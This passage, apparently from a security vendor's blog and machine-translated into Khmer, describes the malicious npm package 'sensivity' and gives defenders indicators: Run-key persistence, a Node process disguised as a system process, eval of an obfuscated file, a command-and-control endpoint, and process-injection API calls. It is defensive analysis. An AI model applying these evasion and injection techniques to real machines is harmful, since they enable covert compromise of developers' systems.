ការ​បិទ​ដំណើរការ​កំណែ​ចិតសិប​គឺជា​និន្នាការ​ដែល​គួរ​ឲ្យ​កត់សម្គាល់។ ការ​បោះពុម្ព​ឡើងវិញ​នូវ​កញ្ចប់​មួយ​រាប់សិប​ដង​ក្នុង​រយៈពេល​ពីរបី​ថ្ងៃ រួមទាំង​ការ​បំពេញ​លេខ​កំណែ​នៅ​ខាងក្រោម​លេខ​កំណែ​ដែល​ត្រូវ​បាន​ដកចេញ​រួចហើយ រក្សា​ច្បាប់​ចម្លង​បន្ត​នៅលើ​បញ្ជី​ឈ្មោះ​រវាង​ការ​ដកចេញ និង​ធ្វើឱ្យ​ខកចិត្ត​ចំពោះ​បញ្ជី​រារាំង​ដែល​បាន​ខ្ទាស់​ដោយ​កំណែ។ ធាតុ​បញ្ជី​រារាំង​សម្រាប់ sensivity@2.5.61 មិន​មាន​អ្វី​ប្រឆាំង​នឹង sensivity@2.5.3 ដែល​បាន​បោះពុម្ព​ឡើងវិញ​នៅថ្ងៃបន្ទាប់​ទេ។

អ្នកការពារអាចធ្វើសកម្មភាពលើចំណុចខាងក្រោម៖

  • រារាំងភាពរសើបនៃឈ្មោះកញ្ចប់ទាំងស្រុងនៅក្នុងបញ្ជីអនុញ្ញាតប្រូកស៊ីចុះបញ្ជី និង CI។ ការខ្ទាស់កំណែនីមួយៗបាត់បង់ចង្វាក់នៃការបោះពុម្ពផ្សាយឡើងវិញ។ ឈ្មោះគឺជាសូចនាករប្រើប្រាស់បានយូរ។
  • ស្វែងរកតម្លៃ Run ដែលមានឈ្មោះថា OneDriveUpdate ដែលទិន្នន័យរបស់វាហៅ wscript.exe ប្រឆាំងនឹង .vbs នៅក្នុងផ្លូវសម្រាប់អ្នកប្រើប្រាស់ម្នាក់ៗ។ កម្មវិធីធ្វើបច្ចុប្បន្នភាព OneDrive ពិតប្រាកដមិនត្រូវបានចុះឈ្មោះតាមវិធីនេះទេ។
  • ការជូនដំណឹងអំពីដំណើរការ Node.js ដែល process.title របស់វាគឺជា Runtime Broker។ ឈ្មួញកណ្តាលពិតប្រាកដគឺ RuntimeBroker.exe មិនមែនជា Node runtime ទេ។
  • សម្គាល់ការទាញយកកញ្ចប់នៅពេលដំឡើង npm ដែលផ្ញើកម្មវិធីបន្ថែម .node ដែលបានចងក្រង បូករួមទាំង eval(fs.readFileSync(…)) នៃឯកសារ .obf.js ដែលជាបងប្អូន។ ការផ្គូផ្គងនោះ — ប្រព័ន្ធគោលពីរដើមស្រអាប់ដែលផ្ទុកនៅជាប់នឹងបន្ទុកអត្ថបទដែលមិនច្បាស់លាស់ — គឺជាការប្រាប់រចនាសម្ព័ន្ធនៅទីនេះ ដោយមិនអាស្រ័យលើ IOC ខ្សែអក្សរណាមួយ។
  • ចាត់ទុកអ្នកស្តាប់ដែលចងភ្ជាប់ក្នុងមូលដ្ឋានណាមួយនៅលើច្រក 3000 ដែលបង្កើតដោយដំណើរការ Node ដែលមិននឹកស្មានដល់ថាជាជនសង្ស័យនៅលើចំណុចបញ្ចប់ Windows ដែលបានគ្រប់គ្រង។
  • រារាំង ឬជូនដំណឹងលើសំណើចេញទៅ izopi.com ពីអ្នកអភិវឌ្ឍន៍ ឬម៉ាស៊ីនមេអ្នកប្រើប្រាស់ចុងក្រោយ។ វាគឺជាចំណុចបញ្ចប់ខាងក្រៅតែមួយគត់របស់កញ្ចប់ ដែលទៅដល់នៅ /check.php ពីម៉ាស៊ីនមេដែលមិនច្បាស់លាស់។
  • សម្រាប់​កម្មវិធី​បន្ថែម .node ដែល​បាន​ភ្ជាប់​មក​ជាមួយ​ណាមួយ សូម​ពិនិត្យ​តារាង​នាំចូល​របស់​វា​មុន​នឹង​ទុកចិត្ត​វា។ ការរួមបញ្ចូលគ្នា OpenProcess + VirtualAllocEx + WriteProcessMemory + CreateRemoteThread គឺជាការចាក់ដំណើរការពីចម្ងាយ ដោយមិនគិតពីអ្វីដែលកញ្ចប់អះអាងថាធ្វើនោះទេ។ នៅទីនេះ វាស្ថិតនៅជាប់នឹងស្រទាប់ Direct3D និងខ្សែអក្សរ aimbot/ESP/triggerbot។

សម្រាប់ការវិភាគឋិតិវន្ត pipelines រូបរាងនៃការជឿជាក់គឺប្រើប្រាស់បានយូរនៅទូទាំងកំណែដែលបោះបង់ចោល៖ ទម្រង់ដំឡើងមិនមែនបណ្តាញ ការកំណត់ចំណងជើងដំណើរការទៅឈ្មោះដំណើរការប្រព័ន្ធដែលគេស្គាល់ ការសរសេរ Run-key តាមរយៈ PowerShell និងការវាយតម្លៃឯកសារដែលបានអានពីថាស។ គ្មានអ្វីមួយក្នុងចំណោមនោះអាស្រ័យលើដែន អាសយដ្ឋាន IP ឬលេខកំណែដែលការបោះពុម្ពផ្សាយឡើងវិញបន្ទាប់អាចបង្វិលចេញបានទេ។

 ឯកសារយោង

[npm: ភាពរសើប] – ទំព័រចុះបញ្ជីសម្រាប់បន្ទាត់កំណែកញ្ចប់ដែលបានពិភាក្សានៅទីនេះ។ អាចនឹងមានការដកចេញ។

ឧបករណ៍វិភាគសមាសភាពកម្មវិធី sca
ផ្តល់អាទិភាព ដោះស្រាយ និងធានាសុវត្ថិភាពហានិភ័យផ្នែកទន់របស់អ្នក
ទទួលបានគណនីឥតគិតថ្លៃរបស់អ្នក។
មិនតម្រូវឱ្យមានកាតឥណទានទេ។

ធានាសុវត្ថិភាពនៃការអភិវឌ្ឍន៍ និងការដឹកជញ្ជូនកម្មវិធីរបស់អ្នក

ជាមួយឈុតផលិតផល Xygeni